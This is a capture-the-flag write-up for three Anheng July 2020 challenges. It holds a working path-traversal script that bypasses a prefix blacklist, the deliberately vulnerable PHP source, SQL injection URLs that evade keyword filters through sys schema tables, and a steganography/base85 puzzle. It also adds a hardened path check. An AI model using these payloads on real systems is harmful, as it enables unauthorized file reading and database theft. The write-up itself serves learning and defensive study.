
Anheng July CTF 2020

Just a few challenges, a quick write-up.

ezfileinclude

When the challenge link is opened, an image is displayed. Viewing the page source shows, inside the img tag, a URL of the form /image.php?t=xxxxx&f=base64(xxxx).

This challenge is about file reading, so the injection point is obviously the f parameter; the only filtering is on a leading ../.

Here I'll use Hhhm's script:

```python
import time
import requests
import base64

# Prefix a harmless directory name so the decoded path does not start with "../",
# which is the only thing the server checks; the "../" segments after it still
# walk out of /var/www/html/img/ when the path is resolved.
file = "hhhm/../../../../../../../../flag"
file = base64.b64encode(file.encode())
url = "http://183.129.189.60:10009/image.php?t={0}&f={1}"
# t must be within 10 seconds of the server's clock.
now = int(time.time())
rep = requests.get(url.format(str(now), file.decode()))
print(rep.text)
```

Source code

```php
<?php

if(!isset($_GET['t']) || !isset($_GET['f'])){
    echo "you miss some parameters";
    exit();
}

$timestamp = time();

if(abs($_GET['t'] - $timestamp) > 10){
    echo "what's your time?";
    exit();
}

$file = base64_decode($_GET['f']);

if(substr($file, 0, strlen("/../")) === "/../" || substr($file, 0, strlen("../")) === "../" || substr($file, 0, strlen("./")) === "./" || substr($file, 0, strlen("/.")) === "/." || substr($file, 0, strlen("//")) === "//") {
    echo 'You are not allowed to do that.';
}
else{
    echo file_get_contents('/var/www/html/img/'.$file);
}

?>
```
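To show why the prefix check in the source above is bypassable, here is an added example (my code, not the page's or the challenge's): a Python re-implementation of the challenge's blacklist next to a normalised-path containment check, run against the writeup's own payload. BASE_DIR is taken from the PHP source; the function names are mine.

```python
import posixpath
from typing import Optional

# Web root hard-coded in the challenge's image.php (value taken from the page).
BASE_DIR = "/var/www/html/img/"

# The traversal prefixes the challenge rejects, verbatim from its substr() checks.
BLOCKED_PREFIXES = ("/../", "../", "./", "/.", "//")


def prefix_blacklist_allows(file: str) -> bool:
    """Re-implementation of the challenge's check: only the *start* of the
    decoded path is compared against a handful of traversal prefixes."""
    return not any(file.startswith(p) for p in BLOCKED_PREFIXES)


def resolve_within_base(file: str, base_dir: str = BASE_DIR) -> Optional[str]:
    """Hardened variant (added here, not the challenge's code): join, normalise,
    and require that the result still lies under base_dir.  Returns the resolved
    path, or None when the request escapes the directory.  posixpath is used so
    the behaviour matches the Linux web root whatever host runs this example.
    A real deployment would use realpath() so symlinks are resolved as well."""
    base = posixpath.normpath(base_dir)
    # join() discards base when file is absolute, so "/etc/passwd" is also caught.
    candidate = posixpath.normpath(posixpath.join(base, file))
    # normpath collapses the "hhhm/../.." segments the prefix check never sees.
    if candidate == base or candidate.startswith(base + "/"):
        return candidate
    return None


if __name__ == "__main__":
    # The writeup's own payload next to a benign request.
    for name in ("hhhm/../../../../../../../../flag", "cat.png"):
        print(f"{name!r:45} blacklist allows={prefix_blacklist_allows(name)}"
              f" resolved={resolve_within_base(name)}")
```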

Sqil

First, fuzzing revealed the regex:

```php
return preg_match("/;|benchmark|\^|if|[\s]|in|case|when|sleep|auto|desc|stat|\||lock|or|and|&|like|-|`/i", $id);
```

Both in and or are filtered, which means information_schema cannot be used.

Generally there are two alternatives for getting around information_schema:

  • sys.x$schema_flattened_keys
  • sys.schema_table_statistics_with_buffer

But stat in the second one is filtered, so the first method is used. Payload to dump the table names:

```text
http://183.129.189.60:10004/?id=0%27/**/union/**/select/**/1,2,group_concat(table_name)from/**/sys.x$schema_flattened_keys/**/where/**/table_schema=database()%23
```

Response:

```text
Array ( [0] => 1 [id] => 1 [1] => 2 [username] => 2 [2] => flllaaaggg,users [password] => flllaaaggg,users )
```

There are two tables, flllaaaggg and users. Column-name-free injection can be used here; for reference see the article 不知道列名的情况下注入 (injecting without knowing the column names).

Read the contents of the users table:

```text
http://183.129.189.60:10004/?id=0%27/**/union/**/select/**/1,2,(select/**/group_concat(c)/**/from(select/**/1/**/as/**/a,2/**/as/**/b,3/**/as/**/c/**/union/**/select*from/**/users)x)%23
```

Read the contents of the flllaaaggg table:

```text
http://183.129.189.60:10004/?id=0%27/**/union/**/select/**/1,2,(select/**/group_concat(b)/**/from(select/**/1/**/as/**/a,2/**/as/**/b/**/union/**/select*from/**/flllaaaggg)x)%23
```

MISC-welcome

If I remember correctly, this is an original challenge from HFCTF (虎符). The attachments are two files, flag.rar and red_blue.png.

Open the image in Stegsolve; Save Bin directly produces an image, and extracting it reveals the password /*///1258/*/@#.

Extracting the archive with 360 Zip and opening it gives:

```text
Ao(mgHXo,o0fV'I2J"^%3&**H@q.MQ1,V%$1GCdB0P"X%0RW
```

At the time I didn't realise it was base85 encoding, so I didn't solve it.

Decoding it online gives the flag: http://ctf.ssleye.com/base85.html